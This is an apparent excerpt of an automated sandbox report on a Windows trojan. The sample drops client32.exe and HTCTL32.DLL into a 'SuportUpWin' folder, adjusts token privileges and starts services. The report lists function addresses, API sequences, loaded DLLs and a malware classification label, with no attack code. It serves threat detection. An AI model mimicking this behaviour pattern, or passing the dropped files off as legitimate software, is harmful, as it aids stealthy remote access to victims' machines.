                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF2EB1A3_2_6CF2EB1A
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF84683_2_6CEF8468
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF045AE3_2_6CF045AE
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF5E7F13_2_6CF5E7F1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF867FF3_2_6CF867FF
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEE21F03_2_6CEE21F0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEFA1DD3_2_6CEFA1DD
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF541593_2_6CF54159
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF522CD3_2_6CF522CD
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF828B3_2_6CEF828B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3A2773_2_6CF3A277
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF782203_2_6CF78220
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF839B3_2_6CEF839B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF71CEF3_2_6CF71CEF
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF9C8E3_2_6CEF9C8E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF3DB13_2_6CEF3DB1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF7D203_2_6CEF7D20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF5E203_2_6CEF5E20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110627B011_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1107368011_2_11073680
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110336D011_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1105180011_2_11051800
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1115F84011_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11029BB011_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1102BD4011_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1101BCD011_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11087F5011_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11045E7011_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1101C11011_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111640E011_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1116834511_2_11168345
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111265B011_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1107043011_2_11070430
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1108074011_2_11080740
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1100892B11_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1101CF3011_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1116EE8B11_2_1116EE8B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF6E2811_2_6CEF6E28
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF6E2411_2_6CEF6E24
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF56E1811_2_6CF56E18
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF7091511_2_6CF70915
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF1091911_2_6CF10919
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF2EB1A11_2_6CF2EB1A
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF846811_2_6CEF8468
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF045AE11_2_6CF045AE
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF5E7F111_2_6CF5E7F1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF867FF11_2_6CF867FF
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEE21F011_2_6CEE21F0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEFA1DD11_2_6CEFA1DD
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF5415911_2_6CF54159
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF522CD11_2_6CF522CD
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF828B11_2_6CEF828B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3A27711_2_6CF3A277
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF7822011_2_6CF78220
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF839B11_2_6CEF839B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF71CEF11_2_6CF71CEF
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF9C8E11_2_6CEF9C8E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF3DB111_2_6CEF3DB1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF7D2011_2_6CEF7D20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF5E2011_2_6CEF5E20
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DF3511_2_6CF3DF35
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF5F8BA11_2_6CF5F8BA
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF5987711_2_6CF59877
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF7396811_2_6CF73968
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF81AE011_2_6CF81AE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DA3811_2_6CF3DA38
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF87B2A11_2_6CF87B2A
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF3B1D11_2_6CEF3B1D
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11161299 appears 81 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11027F40 appears 94 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEF0934 appears 96 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11164ED0 appears 64 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEFA455 appears 53 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 110B7EF0 appears 43 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11147060 appears 1207 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 1105E820 appears 588 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEF072B appears 39 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEFD778 appears 40 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 1105E950 appears 54 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEF0950 appears 215 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEFB69A appears 77 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 111744C6 appears 40 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11147AD0 appears 44 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11081E70 appears 89 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 1109DCE0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 6CEFA42E appears 42 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 11029A70 appears 2012 times
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: String function: 1116FED0 appears 74 times
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: String function: 00419784 appears 41 times
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: String function: 00419E00 appears 49 times
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: String function: 0041ED5C appears 37 times
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: String function: 022A1D7B appears 34 times
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll4 vs hkpqXovZtS.exe
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll4 vs hkpqXovZtS.exe
                                Source: hkpqXovZtS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@4/16@7/2
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1105A760 GetLastError,FormatMessageA,LocalFree,3_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,3_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,3_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,11_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,11_2_1109D8F0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_02291C53 GetCurrentThread,GetCurrentThread,GetThreadPriority,GetCurrentThread,SetThreadPriority,GetCurrentProcessId,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,GetCurrentThread,CloseHandle,GetCurrentThread,SetThreadPriority,0_2_02291C53
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,3_2_11116880
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11089430 FindResourceA,LoadResource,LockResource,3_2_11089430
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,3_2_11128B10
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_6140921Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeMutant created: NULL
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: sfxcmd0_2_0040FBD4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: sfxcmd0_2_0040FBD4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: sfxname0_2_0040FBD4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: xB0_2_0040FBD4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: STARTDLG0_2_0040FBD4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCommand line argument: lB0_2_0040FBD4
                                Source: hkpqXovZtS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: hkpqXovZtS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: hkpqXovZtS.exeReversingLabs: Detection: 52%
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile read: C:\Users\user\Desktop\hkpqXovZtS.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\hkpqXovZtS.exe "C:\Users\user\Desktop\hkpqXovZtS.exe"
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: mscvrt.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: mscvrt.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: mscvrt.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: mscvrt.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: wtsapi32.dllJump to behavior
